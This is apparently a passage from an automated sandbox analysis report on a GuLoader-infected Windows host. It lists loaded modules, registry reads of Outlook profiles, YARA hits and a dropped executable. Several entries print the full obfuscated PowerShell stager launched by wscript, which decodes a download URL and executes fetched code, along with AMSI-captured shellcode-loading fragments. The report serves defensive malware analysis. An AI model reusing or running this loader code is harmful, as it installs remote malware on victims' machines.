Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: ntmarta.dll	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\SysWOW64\dxdiag.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook

Jump to behavior

Source:	Binary string: ore.pdb source: powershell.exe, 00000004.00000002.3052757147.0000000007665000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: m.Core.pdb source: powershell.exe, 00000004.00000002.3052757147.0000000007665000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.3031770631.00000000031A3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: dxdiag.pdbGCTL source: 31437F.exe.20.dr
Source:	Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.3052757147.00000000076AB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: dxdiag.pdb source: 31437F.exe.20.dr

Data Obfuscation

VBScript performs obfuscated calls to suspicious functions

Source: C:\Windows\System32\wscript.exe

Anti Malware Scan Interface: .Run("POWERSHELL "<#Linnas Kandidtwr overskyet Ecdysial Hjlandene Providentialism Selekteringer #>;$Rystelses='Makeress", "0")

Yara detected GuLoader

Source: Yara match	File source: Process Memory Space: dxdiag.exe PID: 1900, type: MEMORYSTR
Source: Yara match	File source: 00000004.00000002.3059770247.000000000A8DE000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3059410794.0000000008A30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2221990774.000001F3C0564000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3047323826.0000000005C5B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Found suspicious powershell code related to unpacking or dynamic code loading

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: FromBase64String($Paradeful)$global:Regionplanarbejder = [System.Text.Encoding]::ASCII.GetString($Sydforhngenes)$global:Snigveje=$Regionplanarbejder.substring($Diktatet,$Syntaksgenkendelserne)<#Swordm
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: GetDelegateForFunctionPointer((Sluds $Mismeasuring $Demonstrating), (Tablelands46 @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:duchesser = [AppDomain]::CurrentDomain.GetAssemblies()$g
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Nonvital)), $Luskeriers).DefineDynamicModule($Lampooning, $false).DefineType($Behight, $Bundtedes, [System.MulticastDelegate])$Distrah
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: FromBase64String($Paradeful)$global:Regionplanarbejder = [System.Text.Encoding]::ASCII.GetString($Sydforhngenes)$global:Snigveje=$Regionplanarbejder.substring($Diktatet,$Syntaksgenkendelserne)<#Swordm

Suspicious powershell command line found

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Linnas Kandidtwr overskyet Ecdysial Hjlandene Providentialism Selekteringer #>;$Rystelses='Makeress';<#plungy Firdobling Preferrers Aftvingende Encoders Hardier Forsvarschefernes #>;$Hvsnings=$host.PrivateData;If ($Hvsnings) {$narrishkeit++;}function atomangreb($Antipapistical246){$Bondske=$Fremmeligst+$Antipapistical246.Length-$narrishkeit;for( $Halfheartednesses=5;$Halfheartednesses -lt $Bondske;$Halfheartednesses+=6){$minkfarven+=$Antipapistical246[$Halfheartednesses];}$minkfarven;}function rme($Stillehavsflaadernes){ . ($posthume) ($Stillehavsflaadernes);}$Gulvmaattens=atomangreb 'SpinaMb ugeoSade zSkyldiD.rivlTsarelPartea Hexi/ uror5Angin. Prod0A.tin Manom(skonnWmyoepibarsen MigodUnaudo SulfwSnv.es Lati Kons NBaan.TIniti Kldni1Regis0Bolig.Kirop0Opsam; Civi AntyW Pub iVir,lnWid.w6Rance4 igna;alene A,tabxReemk6Crabb4Speci;Handl IrettrAl,miv Budg:midda1Colpe2N dbr1Bombe. Hosl0Under)Ambit SubelGRenteeU eldcValthkMeethoHyper/In,ho2 Dune0 etnk1 List0 Medb0Nark 1Subef0Alder1 onr WicksFVaginiTwi.trB rguephanefSci,soEnga,xVandl/Gstel1 umsk2 Feri1Skaks.,inkl0 lge ';$librettoens=atomangreb ' alibU Tea,s CirceSui tRBegav- Geopa StorgInhomeIa.hinGarruTDisge ';$Broderierne=atomangreb 'DimplhAntietDistitGastepB,nussKrake:Ungdo/Funkt/Over.d B llr SelviAfd,ivR vieeAfkri.Drogsg RekloBidraoBe,vegIn.mulmarkseR,gnf.FigetcTuberoFamldm tang/.asteuBev.dcP eud?LammieWorkuxUdsk.pDunbaoTilm rRehant P lm=UnuandCaddioMaskiwkinemnVbnenlDelsao SnivaAtolldTegni&AlumriSm gsdBendi= Paal1 UriniIndtjs RecrL A acUDrapezM.dermSilenFdataiJLige 8Su co9 Dobbm knusOTo fl5ContofOrnam9IngenGLingul TomhoSko euZarisount,uL skdyyRefluVCanon7UdtmtqAdmetEMos itUnderw,avsprDividtFattiRTransuPalma ';$Udviskning=atomangreb 'stose>Nedfr ';$posthume=atomangreb 'BargiiMarkoE SkibX oso ';$Cassina='Kendetegner';$Dentine='\Smaalige.Eks';rme (atomangreb 'Rabat$Noncog Tap lNacroo enlsbE segapsychlStagn:AntisO oodvBo ene alkarForbecPsa ooGrundaM rcet Bire= Dy,t$ .ispeMedionvatikv orev:Tr chaPredapBarfop Scled FraiaMatert eskaaVigil+Bes,a$Dem eDB rmae AndrnSeawat oomsiSpi.nnProloeHa de ');rme (atomangreb ' Viva$PedotgDisselT rmkoSairlb PretaFlig.lClogg: KlasURemain Sregs uspet Hoveu agidSpa ei Op,eeReadodPerp.nSaddueAnke s,oextsKommu=Te,te$DriveB urmarT llgoKarnedBioloeVrlesrHeterinons e,athirOleosnInpute Succ.Illu.s Phy p Swi.lFusibiSerpetEkstr(A ous$Anti,UUnderdG udev,ndiui mprosUnshak OpmanOrga iTroopn J.ckgFarth)Staal ');rme (atomangreb ',arak[ KortNPneumeSo attSkovb.SkrmfSOverpeGarnerEnjoyvSlowmiBauxicU.eskeBrndePUndiso.ealiiFladfn Non tS,okiMPrvepaSquifnPortea GonogDemimeAfspnrOtten] Rip :fagbl: MainSF emmeKontrcBud ruLektir Knowi MldttTo nfyShantPver er KammoSymmet Vo doFl.decstratoStranlModpa Heter=Mini Brneb[drot N,erieeRaah t.umle.ForfrSFiloseMyretcStjfruUdlaarGar liBilbotSpilly tartPHock,rEpicloPapert S lioTagkacFrsteo Li,ilCoh,bT Yanoy aurepBeclaeTypec]Prize:Antnd
Source: unknown	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Linnas Kandidtwr overskyet Ecdysial Hjlandene Providentialism Selekteringer #>;$Rystelses='Makeress';<#plungy Firdobling Preferrers Aftvingende Encoders Hardier Forsvarschefernes #>;$Hvsnings=$host.PrivateData;If ($Hvsnings) {$narrishkeit++;}function atomangreb($Antipapistical246){$Bondske=$Fremmeligst+$Antipapistical246.Length-$narrishkeit;for( $Halfheartednesses=5;$Halfheartednesses -lt $Bondske;$Halfheartednesses+=6){$minkfarven+=$Antipapistical246[$Halfheartednesses];}$minkfarven;}function rme($Stillehavsflaadernes){ . ($posthume) ($Stillehavsflaadernes);}$Gulvmaattens=atomangreb 'SpinaMb ugeoSade zSkyldiD.rivlTsarelPartea Hexi/ uror5Angin. Prod0A.tin Manom(skonnWmyoepibarsen MigodUnaudo SulfwSnv.es Lati Kons NBaan.TIniti Kldni1Regis0Bolig.Kirop0Opsam; Civi AntyW Pub iVir,lnWid.w6Rance4 igna;alene A,tabxReemk6Crabb4Speci;Handl IrettrAl,miv Budg:midda1Colpe2N dbr1Bombe. Hosl0Under)Ambit SubelGRenteeU eldcValthkMeethoHyper/In,ho2 Dune0 etnk1 List0 Medb0Nark 1Subef0Alder1 onr WicksFVaginiTwi.trB rguephanefSci,soEnga,xVandl/Gstel1 umsk2 Feri1Skaks.,inkl0 lge ';$librettoens=atomangreb ' alibU Tea,s CirceSui tRBegav- Geopa StorgInhomeIa.hinGarruTDisge ';$Broderierne=atomangreb 'DimplhAntietDistitGastepB,nussKrake:Ungdo/Funkt/Over.d B llr SelviAfd,ivR vieeAfkri.Drogsg RekloBidraoBe,vegIn.mulmarkseR,gnf.FigetcTuberoFamldm tang/.asteuBev.dcP eud?LammieWorkuxUdsk.pDunbaoTilm rRehant P lm=UnuandCaddioMaskiwkinemnVbnenlDelsao SnivaAtolldTegni&AlumriSm gsdBendi= Paal1 UriniIndtjs RecrL A acUDrapezM.dermSilenFdataiJLige 8Su co9 Dobbm knusOTo fl5ContofOrnam9IngenGLingul TomhoSko euZarisount,uL skdyyRefluVCanon7UdtmtqAdmetEMos itUnderw,avsprDividtFattiRTransuPalma ';$Udviskning=atomangreb 'stose>Nedfr ';$posthume=atomangreb 'BargiiMarkoE SkibX oso ';$Cassina='Kendetegner';$Dentine='\Smaalige.Eks';rme (atomangreb 'Rabat$Noncog Tap lNacroo enlsbE segapsychlStagn:AntisO oodvBo ene alkarForbecPsa ooGrundaM rcet Bire= Dy,t$ .ispeMedionvatikv orev:Tr chaPredapBarfop Scled FraiaMatert eskaaVigil+Bes,a$Dem eDB rmae AndrnSeawat oomsiSpi.nnProloeHa de ');rme (atomangreb ' Viva$PedotgDisselT rmkoSairlb PretaFlig.lClogg: KlasURemain Sregs uspet Hoveu agidSpa ei Op,eeReadodPerp.nSaddueAnke s,oextsKommu=Te,te$DriveB urmarT llgoKarnedBioloeVrlesrHeterinons e,athirOleosnInpute Succ.Illu.s Phy p Swi.lFusibiSerpetEkstr(A ous$Anti,UUnderdG udev,ndiui mprosUnshak OpmanOrga iTroopn J.ckgFarth)Staal ');rme (atomangreb ',arak[ KortNPneumeSo attSkovb.SkrmfSOverpeGarnerEnjoyvSlowmiBauxicU.eskeBrndePUndiso.ealiiFladfn Non tS,okiMPrvepaSquifnPortea GonogDemimeAfspnrOtten] Rip :fagbl: MainSF emmeKontrcBud ruLektir Knowi MldttTo nfyShantPver er KammoSymmet Vo doFl.decstratoStranlModpa Heter=Mini Brneb[drot N,erieeRaah t.umle.ForfrSFiloseMyretcStjfruUdlaarGar liBilbotSpilly tartPHock,rEpicloPapert S lioTagkacFrsteo Li,ilCoh,bT Yanoy aurepBeclaeTypec]Prize:Antnd
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Linnas Kandidtwr overskyet Ecdysial Hjlandene Providentialism Selekteringer #>;$Rystelses='Makeress';<#plungy Firdobling Preferrers Aftvingende Encoders Hardier Forsvarschefernes #>;$Hvsnings=$host.PrivateData;If ($Hvsnings) {$narrishkeit++;}function atomangreb($Antipapistical246){$Bondske=$Fremmeligst+$Antipapistical246.Length-$narrishkeit;for( $Halfheartednesses=5;$Halfheartednesses -lt $Bondske;$Halfheartednesses+=6){$minkfarven+=$Antipapistical246[$Halfheartednesses];}$minkfarven;}function rme($Stillehavsflaadernes){ . ($posthume) ($Stillehavsflaadernes);}$Gulvmaattens=atomangreb 'SpinaMb ugeoSade zSkyldiD.rivlTsarelPartea Hexi/ uror5Angin. Prod0A.tin Manom(skonnWmyoepibarsen MigodUnaudo SulfwSnv.es Lati Kons NBaan.TIniti Kldni1Regis0Bolig.Kirop0Opsam; Civi AntyW Pub iVir,lnWid.w6Rance4 igna;alene A,tabxReemk6Crabb4Speci;Handl IrettrAl,miv Budg:midda1Colpe2N dbr1Bombe. Hosl0Under)Ambit SubelGRenteeU eldcValthkMeethoHyper/In,ho2 Dune0 etnk1 List0 Medb0Nark 1Subef0Alder1 onr WicksFVaginiTwi.trB rguephanefSci,soEnga,xVandl/Gstel1 umsk2 Feri1Skaks.,inkl0 lge ';$librettoens=atomangreb ' alibU Tea,s CirceSui tRBegav- Geopa StorgInhomeIa.hinGarruTDisge ';$Broderierne=atomangreb 'DimplhAntietDistitGastepB,nussKrake:Ungdo/Funkt/Over.d B llr SelviAfd,ivR vieeAfkri.Drogsg RekloBidraoBe,vegIn.mulmarkseR,gnf.FigetcTuberoFamldm tang/.asteuBev.dcP eud?LammieWorkuxUdsk.pDunbaoTilm rRehant P lm=UnuandCaddioMaskiwkinemnVbnenlDelsao SnivaAtolldTegni&AlumriSm gsdBendi= Paal1 UriniIndtjs RecrL A acUDrapezM.dermSilenFdataiJLige 8Su co9 Dobbm knusOTo fl5ContofOrnam9IngenGLingul TomhoSko euZarisount,uL skdyyRefluVCanon7UdtmtqAdmetEMos itUnderw,avsprDividtFattiRTransuPalma ';$Udviskning=atomangreb 'stose>Nedfr ';$posthume=atomangreb 'BargiiMarkoE SkibX oso ';$Cassina='Kendetegner';$Dentine='\Smaalige.Eks';rme (atomangreb 'Rabat$Noncog Tap lNacroo enlsbE segapsychlStagn:AntisO oodvBo ene alkarForbecPsa ooGrundaM rcet Bire= Dy,t$ .ispeMedionvatikv orev:Tr chaPredapBarfop Scled FraiaMatert eskaaVigil+Bes,a$Dem eDB rmae AndrnSeawat oomsiSpi.nnProloeHa de ');rme (atomangreb ' Viva$PedotgDisselT rmkoSairlb PretaFlig.lClogg: KlasURemain Sregs uspet Hoveu agidSpa ei Op,eeReadodPerp.nSaddueAnke s,oextsKommu=Te,te$DriveB urmarT llgoKarnedBioloeVrlesrHeterinons e,athirOleosnInpute Succ.Illu.s Phy p Swi.lFusibiSerpetEkstr(A ous$Anti,UUnderdG udev,ndiui mprosUnshak OpmanOrga iTroopn J.ckgFarth)Staal ');rme (atomangreb ',arak[ KortNPneumeSo attSkovb.SkrmfSOverpeGarnerEnjoyvSlowmiBauxicU.eskeBrndePUndiso.ealiiFladfn Non tS,okiMPrvepaSquifnPortea GonogDemimeAfspnrOtten] Rip :fagbl: MainSF emmeKontrcBud ruLektir Knowi MldttTo nfyShantPver er KammoSymmet Vo doFl.decstratoStranlModpa Heter=Mini Brneb[drot N,erieeRaah t.umle.ForfrSFiloseMyretcStjfruUdlaarGar liBilbotSpilly tartPHock,rEpicloPapert S lioTagkacFrsteo Li,ilCoh,bT Yanoy aurepBeclaeTypec]Prize:Antnd	Jump to behavior

Binary contains a suspicious time stamp

Source: 31437F.exe.20.dr

Static PE information: 0xA39C6329 [Mon Dec 25 02:00:09 2056 UTC]

Uses code obfuscation techniques (call, push, ret)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FF848D600BD pushad ; iretd	2_2_00007FF848D600C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FF848E34DC9 push ebx; ret	2_2_00007FF848E34F5A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_0310326B push cs; iretd	4_2_0310326F

Drops PE files

Source: C:\Windows\SysWOW64\dxdiag.exe

File created: C:\Users\user\AppData\Roaming\188E93\31437F.exe

Jump to dropped file

Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
